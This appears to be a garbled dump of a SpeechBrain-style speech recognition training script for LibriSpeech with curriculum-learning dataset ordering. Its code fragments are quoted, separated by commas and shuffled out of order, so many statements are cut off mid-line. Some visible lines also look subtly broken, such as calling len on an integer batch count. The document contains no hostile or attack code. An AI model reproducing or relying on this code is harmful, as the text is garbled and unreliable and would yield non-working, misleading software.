= self.hparams.acc_computer() self.wer_metric = self.hparams.error_rate_computer() def on_stage_end(self, stage,", "case. For a simple use case (e.g., training a single model with a", "self._parse_dataset_order(ordering_info) ordering_type = \"sorted\" if len(dataset_ordering) > 0 else \"random\" filtered_data_ids = self._filter_dataset(self.data_ids,", "current_epoch = self.hparams.epoch_counter.current valid_search_interval = self.hparams.valid_search_interval if current_epoch % valid_search_interval == 0 or", "dynamic_ncols=True, disable=not enable, ) as t: for batch in t: self.step += 1", "completed_steps + self.step loss, loss_ctc, loss_seq = self.fit_batch(batch) self.avg_train_loss = self.update_average( loss, self.avg_train_loss", "have ``train()``/``eval()`` called on them. opt_class : torch.optim class A torch optimizer constructor", "2020 * <NAME> 2020 * <NAME> 2020 * <NAME> 2020 * <NAME> 2021", "is used only if `weights` is None batch_selection : str Information on how", "(BPE) are used as basic recognition tokens. Training is performed on the full", "= SummaryWriter(self.hparams.output_folder + \"/tensorboard\") def compute_forward(self, batch, stage): \"\"\"Forward computations from the waveform", "``compute_forward()`` * ``compute_objectives()`` The example below illustrates how overriding these two methods is", "train_data = train_data.curriculum_based_filtered_sorted( ordering_info=ordering_info, batch_selection=batch_selection, batch_size=batch_size ) # when sorting do not shuffle", "self.hparams.log_softmax(logits) # output layer for seq2seq log-probabilities pred = self.modules.seq_lin(pred) p_seq = self.hparams.log_softmax(pred)", "keys are test_clean, test_other etc asr_brain.hparams.wer_file = os.path.join( hparams[\"output_folder\"], \"wer_{}.txt\".format(k) ) with torch.no_grad():", "properly changing the parameter files, you can try different encoders, decoders, tokens (e.g,", "max_value=None, select_n=None, reverse=False ): \"\"\"Returns a list of data ids, filtered and sorted", "batch level. select_n : None, int If not None, only keep (at most)", "# print(batch.wrd) # # if cnt == 5: # # exit() # cnt", "but has its own output keys and dynamic items (initially deep copied from", "For more complicated use cases, such as multiple modules that need to be", "speechbrain.Checkpointer By default, this will be used to load checkpoints, and will have", "tokens_eos, tokens_eos_lens) return loss , loss_ctc, loss_seq def fit_batch(self, batch): \"\"\"Train the parameters", "text1 > text2: return 1 elif text1 < text2: return -1 else: return", "= self.hparams.seq_cost( p_seq, tokens_eos, length=tokens_eos_lens ) loss_ctc = self.hparams.ctc_cost(p_ctc, tokens, wav_lens, tokens_lens) loss", "epochs if self.debug and epoch == self.debug_epochs: break def on_evaluate_start(self, max_key=None, min_key=None): \"\"\"perform", "and hasattr( self.train_sampler, \"set_epoch\" ): self.train_sampler.set_epoch(epoch) # Time since last intra-epoch checkpoint last_ckpt_time", ": speechbrain.Checkpointer By default, this will be used to load checkpoints, and will", ") test_datasets[name] = test_datasets[name].filtered_sorted( sort_key=\"duration\" ) datasets = [train_data, valid_data] + [i for", "we need it to encode the labels when creating # mini-batches. tokenizer =", "= [] for batch in np.flipud(np.arange(batch_count)): start_index = batch_size * batch end_index =", "order batches. - Possible Values are `contiguous`, `random`, `sorted`, `reverse-sorted` - Example: *", "If ``True``, automatic mixed-precision is used. Activate it only with cuda. max_grad_norm (float)", "computed[key] >= limit: continue return False for key, limit in key_max_value.items(): if computed[key]", "steps don't need to compute the dynamic items twice. Arguments --------- key_min_value :", "the dataset using ``input_length`` in ascending order , tie is broken using ``output_length``", "ascending or descending\" # ) valid_data = sb.dataio.dataset.DynamicItemDataset.from_csv( csv_path=hparams[\"valid_csv\"], replacements={\"data_root\": data_folder}, ) valid_data", "self.on_stage_end(Stage.TRAIN, self.avg_train_loss, epoch) self.avg_train_loss = 0.0 self.step = 0 # Validation stage if", "performed on the full LibriSpeech dataset (960 h). The best model is the", "load_hyperpyyaml from speechbrain.utils.distributed import run_on_main from speechbrain.dataio.dataset import DynamicItemDataset, FilteredSortedDynamicItemDataset from speechbrain.dataio.sampler import", "-1 else: return 0 def _output_length_comparator( self, key1, key2 ): \"\"\"Compare two data", "else: # recreate dataset using preferred cl approach return else: if self.sortagrad !=", "checkpoint averge if needed\"\"\" super().on_evaluate_start() ckpts = self.checkpointer.find_checkpoints( max_key=max_key, min_key=min_key ) ckpt =", "# create ddp_group with the right communication protocol sb.utils.distributed.ddp_init_group(run_opts) # 1. # Dataset", "dynamic items available) \"\"\" # ordering type can be random, sorted # keys", "value > max_value): weights.pop(key,None) return weights filtered_weights = weights_filter(weights,min_value,max_value) filtered_ids = [] for", "for tup in sorted(filtered_ids, reverse=reverse) ] return filtered_sorted_ids def _parse_dataset_order( self, dataset_order=\"\" ):", "continue else: return res return res shuffled_data_ids = self._random_shuffle_data_ids(data_ids) sorted_data_ids = sorted(shuffled_data_ids,key=cmp_to_key(compare)) weights", "= self.make_dataloader( valid_set, stage=sb.Stage.VALID, ckpt_prefix=None, **valid_loader_kwargs, ) self.on_fit_start() self.train_set = train_set total_steps =", ") return dataloader class CurriculumOrientedDynamicDataset(DynamicItemDataset): def curriculum_based_filtered_sorted( self, key_min_value={}, key_max_value={}, key_test={}, min_weight=None, max_weight=None,", "is not None: # do not reload the weights if training is interrupted", "prepare_librispeech # noqa # Create experiment directory sb.create_experiment_directory( experiment_directory=hparams[\"output_folder\"], hyperparams_to_save=hparams_file, overrides=overrides, ) #", "# ACC is set to 1.1 so checkpointer only keeps the averaged checkpoint", "passed all modules in ``modules`` at the beginning of the ``fit()`` method. This", "twice. Arguments --------- key_min_value : dict Map from key (in data or in", "combined_filter(computed, key_min_value, key_max_value, key_test): filtered_data_ids.append(data_id) return filtered_data_ids def _weighted_filtered_sorted_ids( self, weights, min_value=None, max_value=None,", "(int) Number of epochs to run in debug mode, Default ``2``. If a", "before stage 2 group = current_optimizer.param_groups[0] if \"momentum\" not in group: return self.checkpointer.recover_if_possible(", "\"data_folder\": hparams[\"data_folder\"], \"tr_splits\": hparams[\"train_splits\"], \"dev_splits\": hparams[\"dev_splits\"], \"te_splits\": hparams[\"test_splits\"], \"save_folder\": hparams[\"data_folder\"], \"merge_lst\": hparams[\"train_splits\"], \"merge_name\":", "iterates epochs and datasets for the purpose of \"fitting\" a set of modules", "create final dataset batch_size : 8, int Used to divide the dataset into", "the average of the checkpoints from last 5 epochs. The experiment file is", "pipeline: @sb.utils.data_pipeline.takes(\"wav\") @sb.utils.data_pipeline.provides(\"sig\") def audio_pipeline(wav): sig = sb.dataio.dataio.read_audio(wav) return sig sb.dataio.dataset.add_dynamic_item(datasets, audio_pipeline) #", "of how the AM is doing hyps, _ = self.hparams.valid_search(enc_out.detach(), wav_lens) elif stage", "so they have the same dynamic items available) \"\"\" # ordering type can", "criteria.\"\"\" def combined_filter(computed, key_min_value, key_max_value, key_test): \"\"\"Checks if the data example fulfills the", "a decoder, and an attention mechanism between them. Decoding is performed with (CTC/Att", "set of modules to a set of data. In order to use the", "): \"\"\"Shuffle the data_ids in random order\"\"\" return np.random.permutation(data_ids) def _random_shuffled_weights( self, data_ids", "hasattr(self.hparams, \"augmentation\"): feats = self.hparams.augmentation(feats) # forward modules src = self.modules.CNN(feats) enc_out, pred", "valid_stats=stage_stats, ) self.checkpointer.save_and_keep_only( meta={\"ACC\": stage_stats[\"ACC\"], \"epoch\": epoch}, max_keys=[\"ACC\"], num_to_keep=5, ) elif stage ==", "if stage == sb.Stage.TRAIN: hyps = None elif stage == sb.Stage.VALID: hyps =", "If a DataLoader is given, it is used directly. train_loader_kwargs : dict Kwargs", "e.g., self.hparams.model(x). run_opts : dict A set of options to change the runtime", "valid_set is a Dataset, not DataLoader). E.g., batch_size, num_workers. DataLoader kwargs are all", "None: self.checkpointer.add_recoverable(\"optimizer\", self.optimizer) self.switched = True def on_fit_start(self): \"\"\"Initialize the right optimizer on", "computations. auto_mix_prec (bool) If ``True``, automatic mixed-precision is used. Activate it only with", "path given in the YAML file). The tokenizer is loaded at the same", "stage self.on_stage_start(Stage.TRAIN, epoch) self.modules.train() # Reset nonfinite count to 0 each epoch self.nonfinite_count", "self.ordering = self.hparams.ordering self.batch_selection = self.hparams.batch_selection self.sortagrad = sortagrad # create tensorboard summary", "the dataset at batch level\"\"\" data_ids = list(weights.keys()) for data_id in data_ids: data_id[weights[data_id]]", "valid_search_interval == 0 or stage == sb.Stage.TEST ): stage_stats[\"WER\"] = self.wer_metric.summarize(\"error_rate\") # log", "better results. # train_data = train_data.filtered_sorted(sort_key=\"duration\") # # when sorting do not shuffle", "filtered_sorted_ids = self._weighted_filtered_sorted_ids( weights, min_weight, max_weight, select_n ) return FilteredSortedDynamicItemDataset( self, filtered_sorted_ids )", "return train_data, valid_data, test_datasets, tokenizer if __name__ == \"__main__\": # CLI: hparams_file, run_opts,", "in t: self.step += 1 global_step = completed_steps + self.step loss, loss_ctc, loss_seq", "points based on output length\"\"\" length1 = len(self.data[key1][\"wrd\"]) length2 = len(self.data[key2][\"wrd\"]) if length1", "data_ids: data_id[weights[data_id]] = data_id data_count = len(data_ids) batch_count = math.ceil(data_count / batch_size) shuffled_data_ids", "self.step % self.hparams.gradient_accumulation == 0: # gradient clipping & early stop if loss", "is pointless hparams[\"train_dataloader_opts\"][\"shuffle\"] = False # if hparams[\"sorting\"] == \"ascending\": # # we", "return p_ctc, p_seq, wav_lens, hyps def compute_objectives(self, predictions, batch, stage): \"\"\"Computes the loss", "ordered based on `ordering_info`, divide the dataset into batches of size `batch_size` and", "= key2 \"\"\" for ordering in dataset_orderings: key = ordering[\"key\"] order = 1", "a epoch. This is used to handle , whether the dataset needs to", "dict Map from data_id to weight, these weight(s) will be used to sort", "self.output_keys_as(temp_keys): for i, data_id in enumerate(data_ids): data_point = self.data[data_id] data_point[\"id\"] = data_id computed", "): \"\"\"Compare two data points based on alphabetic order\"\"\" text1 = self.data[key1][\"wrd\"] text2", "\"augmentation\"): feats = self.hparams.augmentation(feats) # forward modules src = self.modules.CNN(feats) enc_out, pred =", "= self.hparams.test_search(enc_out.detach(), wav_lens) return p_ctc, p_seq, wav_lens, hyps def compute_objectives(self, predictions, batch, stage):", "# create tensorboard summary writer self.tensorboard_writer = SummaryWriter(self.hparams.output_folder + \"/tensorboard\") def compute_forward(self, batch,", "on alphabetic order\"\"\" text1 = self.data[key1][\"wrd\"] text2 = self.data[key2][\"wrd\"] if text1 > text2:", "stage == sb.Stage.TEST ): # Decode token terms to words predicted_words = [", "report different epoch stages according current stage current_epoch = self.hparams.epoch_counter.current if current_epoch <=", "# the path given in the YAML file). The tokenizer is loaded at", "asr_brain.fit( asr_brain.hparams.epoch_counter, train_data, valid_data, train_loader_kwargs=hparams[\"train_dataloader_opts\"], valid_loader_kwargs=hparams[\"valid_dataloader_opts\"], ) # Testing for k in test_datasets.keys():", "class A torch optimizer constructor that has takes only the list of parameters", "= Stage.TRAIN, # **hparams[\"valid_dataloader_opts\"] # ) # with tqdm( # train_set, # initial=0,", "= test_datasets[name].filtered_sorted( sort_key=\"duration\" ) datasets = [train_data, valid_data] + [i for k, i", "Sort the dataset using ``input_length`` in ascending order , tie is broken using", "different epoch stages according current stage current_epoch = self.hparams.epoch_counter.current if current_epoch <= self.hparams.stage_one_epochs:", "filtered_data_ids = self._filter_dataset(self.data_ids, key_min_value, key_max_value, key_test) # order entire dataset if ordering_type ==", "self, data_ids ): \"\"\"Shuffle the data_ids in random order\"\"\" return np.random.permutation(data_ids) def _random_shuffled_weights(", "by default if they have trainable parameters, and will have ``train()``/``eval()`` called on", "not hasattr(self, \"switched\"): self.switched = False if isinstance(self.optimizer, torch.optim.SGD): self.switched = True if", "isinstance(self.optimizer, torch.optim.SGD): self.switched = True if self.switched is True: return if current_epoch >", "`output_length`, `alphabetic` - Options for order: `asc`, `desc` - Example: * \"input_length:asc,output_length:desc\" -", "keep (at most) the first n filtered data_points. The possible sorting is applied,", "tqdm( # train_set, # initial=0, # dynamic_ncols=True, # disable=False, # ) as t:", "delete the rest of the intermediate checkpoints # ACC is set to 1.1", "process. Arguments --------- epoch_counter : iterable Each call should return an integer indicating", "value. Default: ``5``. nonfinite_patience (int) Number of times to ignore non-finite losses before", "from key (in data or in dynamic items) to func, will only keep", "weights.pop(key,None) return weights filtered_weights = weights_filter(weights,min_value,max_value) filtered_ids = [] for i, data_id in", "``fit()`` method, one should sub-class the ``Brain`` class and override any methods for", "\"\"\" if self.inter_epoch_dataset_updation: if self.sortagrad != -1: # number of epochs for which", "def compute_forward(self, batch, stage): \"\"\"Forward computations from the waveform batches to the output", "import run_on_main from speechbrain.dataio.dataset import DynamicItemDataset, FilteredSortedDynamicItemDataset from speechbrain.dataio.sampler import ReproducibleRandomSampler from tqdm.contrib", "batch_size, num_workers. DataLoader kwargs are all valid. progressbar : bool Whether to display", "- key1 < key2 * 0 - key1 = key2 \"\"\" for ordering", "the end of the evaluation stage # delete the rest of the intermediate", "recreate dataset using random shuffling return else: return def check_and_reset_optimizer(self): \"\"\"reset the optimizer", "global_step = completed_steps + self.step loss, loss_ctc, loss_seq = self.fit_batch(batch) self.avg_train_loss = self.update_average(", "set(key_min_value.keys()) | set(key_max_value.keys()) | set(key_test.keys()) ) filtered_data_ids = [] with self.output_keys_as(temp_keys): for i,", "is automatically created. If a DataLoader is given, it is used directly. train_loader_kwargs", "for order in orderings: if order.strip() == '': continue column,order = order.split(\":\") ordering_info.append({\"key\":column,\"order\":order})", "different systems. By properly changing the parameter files, you can try different encoders,", "from pathlib import Path import speechbrain as sb from hyperpyyaml import load_hyperpyyaml from", "enumerate(shuffled_data_ids): weights[data_id] = index return weights def _custom_sorted_weights( self, data_ids, dataset_orderings ): \"\"\"Create", "* loss_ctc + (1 - self.hparams.ctc_weight) * loss_seq ) if stage != sb.Stage.TRAIN:", "in ascending order , tie is broken using ``output_length`` in descending order Note:", "self.debug and self.step == self.debug_batches: break # Write validation summary to tensorboard self.tensorboard_writer.add_scalar(\"Validation/Loss/tot_loss\",", "(in data or in dynamic items) to func, will only keep data_point if", "sb.Stage.TRAIN: if hasattr(self.modules, \"env_corrupt\"): wavs_noise = self.modules.env_corrupt(wavs, wav_lens) wavs = torch.cat([wavs, wavs_noise], dim=0)", "optimizer, } self.hparams.train_logger.log_stats( stats_meta=epoch_stats, train_stats=self.train_stats, valid_stats=stage_stats, ) self.checkpointer.save_and_keep_only( meta={\"ACC\": stage_stats[\"ACC\"], \"epoch\": epoch}, max_keys=[\"ACC\"],", "return res return res shuffled_data_ids = self._random_shuffle_data_ids(data_ids) sorted_data_ids = sorted(shuffled_data_ids,key=cmp_to_key(compare)) weights = {}", "default, it is False sortagrad: int Number of epochs, for which curriculum based", "at the end of the evaluation stage # delete the rest of the", "only keep data_point if weight[data_point] < max_weight weights : None, dict Map from", "and expected to have a certain behavior: * ``fit_batch()`` * ``evaluate_batch()`` * ``update_average()``", "and save checkpoint at end-of-epoch if stage == sb.Stage.VALID and sb.utils.distributed.if_main_process(): # report", "bool Whether dataset must be updated every between epochs or not. It is", "= self.compute_forward(batch, sb.Stage.TRAIN) loss, loss_ctc, loss_seq = self.compute_objectives(predictions, batch, sb.Stage.TRAIN) # normalize the", "batches of size `batch_size` and order these batches randomly to create final dataset", "limit: continue return False for key, limit in key_max_value.items(): if computed[key] <= limit:", "tokens_eos_lens) return loss , loss_ctc, loss_seq def fit_batch(self, batch): \"\"\"Train the parameters given", "dict of str:torch.nn.Module pairs These modules are passed to the optimizer by default", "data_folder}, # ) train_data = CurriculumOrientedDynamicDataset.from_csv( csv_path=hparams[\"train_csv\"], replacements={\"data_root\": data_folder}, ) ordering_info = hparams[\"ordering\"]", "len(dataset_ordering) > 0 else \"random\" filtered_data_ids = self._filter_dataset(self.data_ids, key_min_value, key_max_value, key_test) # order", "order batchwise if batch_selection == \"contiguous\": pass elif batch_selection == \"random\": weights =", "neural language model. To run this recipe, do the following: > python train.py", "the default behavior does not match the use case. For a simple use", "from model and reshuffles the dataset. By, default, it is False sortagrad: int", "import speechbrain as sb from hyperpyyaml import load_hyperpyyaml from speechbrain.utils.distributed import run_on_main from", "is automatically created. If a DataLoader is given, it is used directly. valid_set", "wav_lens]) tokens_bos = torch.cat([tokens_bos, tokens_bos], dim=0) # compute features feats = self.hparams.compute_features(wavs) current_epoch", "every update self.hparams.noam_annealing(self.optimizer) return loss.detach() , loss_ctc.detach(), loss_seq.detach() def evaluate_batch(self, batch, stage): \"\"\"Computations", "not self.noprogressbar # Iterate epochs for epoch in epoch_counter: # Training stage self.on_stage_start(Stage.TRAIN,", ", tie is broken using ``output_length`` in descending order Note: This is used", "epoch_counter : iterable Each call should return an integer indicating the epoch count.", "csv_path=hparams[\"train_csv\"], replacements={\"data_root\": data_folder}, ) ordering_info = hparams[\"ordering\"] batch_selection = hparams[\"batch_selection\"] batch_size = int(hparams[\"batch_size\"])", "a few epochs if self.debug and epoch == self.debug_epochs: break def on_evaluate_start(self, max_key=None,", "== \"__main__\": # CLI: hparams_file, run_opts, overrides = sb.parse_arguments(sys.argv[1:]) with open(hparams_file) as fin:", "`alphabetic` - Options for order: `asc`, `desc` - Example: * \"input_length:asc,output_length:desc\" - Sort", "run_on_main from speechbrain.dataio.dataset import DynamicItemDataset, FilteredSortedDynamicItemDataset from speechbrain.dataio.sampler import ReproducibleRandomSampler from tqdm.contrib import", "self, dataset_order=\"\" ): \"\"\"Takes in `ordering_info` in string as input and creates a", "sort the dataset at batch level\"\"\" data_ids = list(weights.keys()) for data_id in data_ids:", "@sb.utils.data_pipeline.takes(\"wav\") @sb.utils.data_pipeline.provides(\"sig\") def audio_pipeline(wav): sig = sb.dataio.dataio.read_audio(wav) return sig sb.dataio.dataset.add_dynamic_item(datasets, audio_pipeline) # 3.", "log-probabilities logits = self.modules.ctc_lin(enc_out) p_ctc = self.hparams.log_softmax(logits) # output layer for seq2seq log-probabilities", "valid_loader_kwargs={}, ): \"\"\"Iterate epochs and datasets to improve objective. Relies on the existence", "= self._reverse_sort_batches(weights, batch_size) else: raise NotImplementedError( \"Ordering Type must be one of random,", "= current_optimizer.param_groups[0] if \"momentum\" not in group: return self.checkpointer.recover_if_possible( device=torch.device(self.device) ) def fit(", "neural network is trained on both CTC and negative-log likelihood targets and sub-word", "if stage == sb.Stage.VALID and sb.utils.distributed.if_main_process(): # report different epoch stages according current", "tqdm( self.train_set, initial=self.step, dynamic_ncols=True, disable=not enable, ) as t: for batch in t:", "self.data[key1][\"wrd\"] text2 = self.data[key2][\"wrd\"] if text1 > text2: return 1 elif text1 <", "# elif hparams[\"sorting\"] == \"descending\": # train_data = train_data.filtered_sorted( # sort_key=\"duration\", reverse=True #", "used is defined if self.sortagrad < epoch: # recreate dataset using random shuffling", "<NAME> 2020 * <NAME> 2020 * <NAME> 2020 * <NAME> 2021 \"\"\" import", "in enumerate(weights.keys()): if select_n is not None and len(filtered_ids) == select_n: break filtered_ids.append((weights[data_id],i,data_id))", "a non-positive number is passed, all epochs are run. jit_module_keys (list of str)", "kwargs are all valid. progressbar : bool Whether to display the progress of", "> duration2: return 1 elif duration1 < duration2: return -1 else: return 0", "{} for csv_file in hparams[\"test_csv\"]: name = Path(csv_file).stem test_datasets[name] = sb.dataio.dataset.DynamicItemDataset.from_csv( csv_path=csv_file, replacements={\"data_root\":", "ignore non-finite losses before stopping. Default: ``3``. noprogressbar (bool) Whether to turn off", "dataset if ordering_type == \"random\": weights = self._random_shuffled_weights(filtered_data_ids) elif ordering_type == \"sorted\": if", "== self.debug_batches: break # Write validation summary to tensorboard self.tensorboard_writer.add_scalar(\"Validation/Loss/tot_loss\", avg_valid_loss, epoch) self.tensorboard_writer.add_scalar(\"Validation/Accuracy/tot_acc\",", "dataset_ordering) else: pass else: raise NotImplementedError( \"Ordering Type must be one of random,", "key1 < key2 * 0 - key1 = key2 \"\"\" for ordering in", "current_epoch % self.hparams.valid_search_interval == 0: # for the sake of efficiency, we only", "integer indicating the epoch count. train_set : Dataset, DataLoader A set of data", ", whether the dataset needs to be reshuffled at the end of epoch", "2\"\"\" current_epoch = self.hparams.epoch_counter.current if not hasattr(self, \"switched\"): self.switched = False if isinstance(self.optimizer,", "loaded at the same time. run_on_main(hparams[\"pretrainer\"].collect_files) hparams[\"pretrainer\"].load_collected(device=run_opts[\"device\"]) # Trainer initialization asr_brain = ASR(", ") def recreate_train_dataset(self,epoch): \"\"\"Gets called at the end of a epoch. This is", "that has takes only the list of parameters (e.g. a lambda or partial", "0 and the distributed_backend is ddp, this will generally handle multiprocess logic, like", "speechbrain.dataio.dataset import DynamicItemDataset, FilteredSortedDynamicItemDataset from speechbrain.dataio.sampler import ReproducibleRandomSampler from tqdm.contrib import tqdm import", "key, func in key_test.items(): if bool(func(computed[key])): continue return False return True temp_keys =", "bool(func(computed[key])): continue return False return True temp_keys = ( set(key_min_value.keys()) | set(key_max_value.keys()) |", "on `ordering_info`, divide the dataset into batches of size `batch_size` and order these", "weights if training is interrupted right before stage 2 group = current_optimizer.param_groups[0] if", "dataset using ordering info weights = self._custom_sorted_weights(filtered_data_ids, dataset_ordering) else: pass else: raise NotImplementedError(", "single model with a single dataset) the only methods that need to be", "progressbar when training. Default: ``False``. ckpt_interval_minutes (float) Amount of time between saving intra-epoch", "run validation \"on_stage_end\" on main process self.step = 0 run_on_main( self.on_stage_end, args=[Stage.VALID, avg_valid_loss,", "handle multiprocess logic, like splitting the training data into subsets for each device", "if self.inter_epoch_dataset_updation: if self.sortagrad != -1: # number of epochs for which curriculum", "\"\"\"Reverse sort the dataset at batch level\"\"\" data_ids = list(weights.keys()) for data_id in", "to compute the dynamic items twice. Arguments --------- key_min_value : dict Map from", "from this, so they have the same dynamic items available) \"\"\" # ordering", "in key_max_value.items(): if computed[key] <= limit: continue return False for key, func in", "= self.compute_forward(batch, stage=stage) loss, _, _ = self.compute_objectives(predictions, batch, stage=stage) return loss.detach() def", "checkpoint at the end of the evaluation stage # delete the rest of", "self.train_sampler is not None and hasattr( self.train_sampler, \"set_epoch\" ): self.train_sampler.set_epoch(epoch) # Time since", "length1 < length2: return -1 else: return 0 def _alphabetic_comparator( self, key1, key2", "otherwise is pointless # hparams[\"train_dataloader_opts\"][\"shuffle\"] = False # elif hparams[\"sorting\"] == \"random\": #", "only saving a checkpoint on the main process. Arguments --------- epoch_counter : iterable", "batch_size) shuffled_data_ids = [] for batch in np.flipud(np.arange(batch_count)): start_index = batch_size * batch", "jit_module_keys (list of str) List of keys in ``modules`` that should be jit", "given, it is used directly. train_loader_kwargs : dict Kwargs passed to `make_dataloader()` for", "labels when creating # mini-batches. tokenizer = hparams[\"tokenizer\"] # 2. Define audio pipeline:", "environment, including debug (bool) If ``True``, this will only iterate a few batches", "default, it is ``-1``. \"\"\" def __init__( self, modules=None, opt_class=None, hparams=None, run_opts=None, checkpointer=None,", "a hyperparameter that is used within the overridden methods. These will be accessible", "run_opts : dict A set of options to change the runtime environment, including", "are used as basic recognition tokens. Training is performed on the full LibriSpeech", "on both CTC and negative-log likelihood targets and sub-word units estimated with Byte", "in ``modules`` that should be jit compiled. distributed_count (int) Number of devices to", "large variety of different systems. By properly changing the parameter files, you can", "best model is the average of the checkpoints from last 5 epochs. The", "weights = self._reverse_sort_batches(weights, batch_size) else: raise NotImplementedError( \"Ordering Type must be one of", "total_steps with tqdm( self.train_set, initial=self.step, dynamic_ncols=True, disable=not enable, ) as t: for batch", "Trainer initialization asr_brain = ASR( modules=hparams[\"modules\"], opt_class=hparams[\"Adam\"], hparams=hparams, run_opts=run_opts, checkpointer=hparams[\"checkpointer\"], ) # adding", "``n`` number of epochs By default, it is ``-1``. \"\"\" def __init__( self,", "the only methods that need to be overridden are: * ``compute_forward()`` * ``compute_objectives()``", "= index return weights def _input_length_comparator( self, key1, key2 ): \"\"\"Compare two data", "= self.hparams.SGD(self.modules.parameters()) # Load latest checkpoint to resume training if interrupted if self.checkpointer", "* batch end_index = min((batch_size+1)*batch, len(data_count)) shuffled_data_ids += data_ids[start_index:end_index] assert len(shuffled_data_ids) == len(data_ids)", "< length2: return -1 else: return 0 def _alphabetic_comparator( self, key1, key2 ):", "ordering_type = \"sorted\" if len(dataset_ordering) > 0 else \"random\" filtered_data_ids = self._filter_dataset(self.data_ids, key_min_value,", "wavs_noise], dim=0) wav_lens = torch.cat([wav_lens, wav_lens]) tokens_bos = torch.cat([tokens_bos, tokens_bos], dim=0) # compute", "self.compute_objectives(predictions, batch, sb.Stage.TRAIN) # normalize the loss by gradient_accumulation step (loss / self.hparams.gradient_accumulation).backward()", "decoder probabilities. The neural network is trained on both CTC and negative-log likelihood", ") # save attributes related to curriculum learning self.inter_epoch_dataset_updation = inter_epoch_dataset_updation self.ordering =", "batches. This helps in ordering the dataset at batch level. select_n : None,", "If comparison using `key` returned data points as equal, continue # comparing using", "`ordering_info` in string as input and creates a dictionary out of it\"\"\" ordering_info", "few batches for all datasets, to ensure code runs without crashing. debug_batches (int)", "key (in data or in dynamic items) to func, will only keep data_point", "torch.cat([tokens_bos, tokens_bos], dim=0) # compute features feats = self.hparams.compute_features(wavs) current_epoch = self.hparams.epoch_counter.current feats", "res == 0: continue else: return res return res shuffled_data_ids = self._random_shuffle_data_ids(data_ids) sorted_data_ids", "utt_seq in hyps ] target_words = [wrd.split(\" \") for wrd in batch.wrd] self.wer_metric.append(ids,", "to speed up training and get better results. # train_data = train_data.filtered_sorted(sort_key=\"duration\") #", "\"sig\", \"wrd\", \"tokens_bos\", \"tokens_eos\", \"tokens\",\"duration\"], ) return train_data, valid_data, test_datasets, tokenizer if __name__", "if length1 > length2: return 1 elif length1 < length2: return -1 else:", "== self.debug_batches: break if ( self.checkpointer is not None and self.ckpt_interval_minutes > 0", "dataset, stage, ckpt_prefix=\"dataloader-\", **loader_kwargs, ): # TRAIN stage is handled specially. dataloader =", "be changed by overriding the ``configure_optimizers()`` method. hparams : dict Each key:value pair", "is used in CL which takes feedback from model and reshuffles the dataset.", "sorted, weighted_sorted.\" ) # order batchwise if batch_selection == \"contiguous\": pass elif batch_selection", "from stage two, reinitialize the optimizer current_epoch = self.hparams.epoch_counter.current current_optimizer = self.optimizer if", "self.hparams.ctc_cost(p_ctc, tokens, wav_lens, tokens_lens) loss = ( self.hparams.ctc_weight * loss_ctc + (1 -", "device=torch.device(self.device) ) def fit( self, epoch_counter, train_set, valid_set=None, progressbar=None, train_loader_kwargs={}, valid_loader_kwargs={}, ): \"\"\"Iterate", "= int(hparams[\"batch_size\"]) train_data = train_data.curriculum_based_filtered_sorted( ordering_info=ordering_info, batch_selection=batch_selection, batch_size=batch_size ) # when sorting do", "dataset_orderings: key = ordering[\"key\"] order = 1 if ordering[\"order\"] == \"asc\" else -1", "update self.hparams.noam_annealing(self.optimizer) return loss.detach() , loss_ctc.detach(), loss_seq.detach() def evaluate_batch(self, batch, stage): \"\"\"Computations needed", "continue training if interrupted. inter_epoch_dataset_updation : bool Whether dataset must be updated every", "if hasattr(self.hparams, \"augmentation\"): feats = self.hparams.augmentation(feats) # forward modules src = self.modules.CNN(feats) enc_out,", ") if stage != sb.Stage.TRAIN: current_epoch = self.hparams.epoch_counter.current valid_search_interval = self.hparams.valid_search_interval if current_epoch", "lr, \"steps\": steps, \"optimizer\": optimizer, } self.hparams.train_logger.log_stats( stats_meta=epoch_stats, train_stats=self.train_stats, valid_stats=stage_stats, ) self.checkpointer.save_and_keep_only( meta={\"ACC\":", "dataset be used. It can take one of three values * ``-1`` -", "disable=not enable, ) as t: for batch in t: self.step += 1 global_step", "): \"\"\"Create random weightages for data_ids\"\"\" shuffled_ids = self._random_shuffle_data_ids(data_ids) weights = {} for", "data_id in enumerate(weights.keys()): if select_n is not None and len(filtered_ids) == select_n: break", "train \"on_stage_end\" on all processes self.on_stage_end(Stage.TRAIN, self.avg_train_loss, epoch) self.avg_train_loss = 0.0 self.step =", "of different systems. By properly changing the parameter files, you can try different", "(float) Default implementation of ``fit_batch()`` uses ``clip_grad_norm_`` with this value. Default: ``5``. nonfinite_patience", "min_value = float(min_value) if isinstance(max_value,int): max_value = float(max_value) for key,value in weights.items(): if", "epochs and datasets for the purpose of \"fitting\" a set of modules to", "# mini-batches. tokenizer = hparams[\"tokenizer\"] # 2. Define audio pipeline: @sb.utils.data_pipeline.takes(\"wav\") @sb.utils.data_pipeline.provides(\"sig\") def", "as t: # cnt = 0 # for batch in t: # #", "data_point[\"id\"] = data_id computed = self.pipeline.compute_outputs(data_point) if combined_filter(computed, key_min_value, key_max_value, key_test): filtered_data_ids.append(data_id) return", "must be one of random, sorted, weighted_sorted.\" ) # create Dataloader using the", "csv_path=hparams[\"train_csv\"], replacements={\"data_root\": data_folder}, # ) train_data = CurriculumOrientedDynamicDataset.from_csv( csv_path=hparams[\"train_csv\"], replacements={\"data_root\": data_folder}, ) ordering_info", "beamsearch coupled with a neural language model. To run this recipe, do the", "stage == sb.Stage.TEST: self.hparams.train_logger.log_stats( stats_meta={\"Epoch loaded\": self.hparams.epoch_counter.current}, test_stats=stage_stats, ) with open(self.hparams.wer_file, \"w\") as", "+= 1 global_step = completed_steps + self.step loss, loss_ctc, loss_seq = self.fit_batch(batch) self.avg_train_loss", "to the output probabilities.\"\"\" batch = batch.to(self.device) wavs, wav_lens = batch.sig tokens_bos, _", "dataset_order=\"\" ): \"\"\"Takes in `ordering_info` in string as input and creates a dictionary", "in np.flipud(np.arange(batch_count)): start_index = batch_size * batch end_index = min((batch_size+1)*batch, len(data_count)) shuffled_data_ids +=", "key2 ): \"\"\"Compare two data points based on input length\"\"\" duration1 = float(self.data[key1][\"duration\"])", "writer self.tensorboard_writer = SummaryWriter(self.hparams.output_folder + \"/tensorboard\") def compute_forward(self, batch, stage): \"\"\"Forward computations from", "fit_batch(self, batch): \"\"\"Train the parameters given a single batch in input\"\"\" # check", "display the progress of each epoch in a progressbar. \"\"\" if not (", "key_test) # order entire dataset if ordering_type == \"random\": weights = self._random_shuffled_weights(filtered_data_ids) elif", "pass else: raise NotImplementedError( \"Ordering Type must be one of random, sorted, weighted_sorted.\"", "DataLoader kwargs are all valid. 